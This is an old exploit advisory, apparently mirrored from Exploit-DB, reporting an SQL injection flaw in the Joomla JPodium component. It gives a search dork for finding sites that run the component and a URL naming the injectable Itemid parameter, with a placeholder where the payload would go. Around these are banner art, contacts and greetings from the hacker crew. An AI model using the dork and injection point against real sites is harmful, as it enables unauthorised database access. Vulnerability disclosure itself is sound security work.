Joomla! Component JPodium 2.7.3 – SQL Injection

  • 作者: RoAd_KiLlEr
    日期: 2010-07-05
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/14232/
  • 1########################################### 1
0 I'm **RoAd_KiLlEr**member from Inj3ct0r Team 1
1########################################### 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1

[+]Title Joomla JPodiumComponent(com_jpodium)SQL-i Vulnerability
[+]Author**RoAd_KiLlEr**
[+]ContactRoAd_KiLlEr[at]Khg-Crew[dot]Ws
[+]Tested on Win Xp Sp 2/3
[+]Version2.7.3
---------------------------------------------------------------------------
[~] Founded by **RoAd_KiLlEr**
[~] Team: Albanian Hacking Crew
[~] Contact: RoAd_KiLlEr[at]Khg-Crew[dot]Ws 
[~] Home: http://a-h-crew.net
[~] Download App:http://www.jpodium.de/index.php?option=com_rokdownloads&view=file&task=download&id=31%3Acomponent-v-0-9&Itemid=3
[~] Version:0.9.015
[~] Vendor: http://www.jpodium.de/
==========ExPl0iT3d by **RoAd_KiLlEr**==========

[+]Description:
JPodium is a Joomla! component to manage and display sports results. The intended use is to keep track of race results for e.g. a cycling club portal. Of course it is not fixed to any kind of sports but more to a certain structure of race results. This means that every athlete has a class (e.g. age class like "Master") attached and the results are listed per race in this classes.
=========================================

[+] Dork: inurl:"com_jpodium"

==========================================


[+].SQL-i Vulnerability
=+=+=+=+=+=+=+=+=+

[Exploit]:http://127.0.0.1/path/index.php?option=com_jpodium&view=races&Itemid= [SQL Injection] 



===========================================================================================
[!] Albanian Hacking Crew 
===========================================================================================
[!] **RoAd_KiLlEr** 
===========================================================================================
[!] MaiL: sukihack[at]gmail[dot]com
===========================================================================================
[!] Greetz To : Ton![w]indowS | X-n3t | b4cKd00r ~ | DarKHackeR. | The|DennY` | EaglE EyE | Lekosta | KHG | THE_1NV1S1BL3 & All Albanian/Kosova Hackers 
===========================================================================================
[!] Spec Th4nks:r0073r| indoushka from Dz-Ghost Team| MaFFiTeRRoR | AllInj3ct0r 31337 Members | And All My Friendz
===========================================================================================
[!] Red n'black i dress eagle on my chest
It's good to be an ALBANIAN
Keep my head up high for that flag I die
Im proud to be an ALBANIAN
===========================================================================================
    Python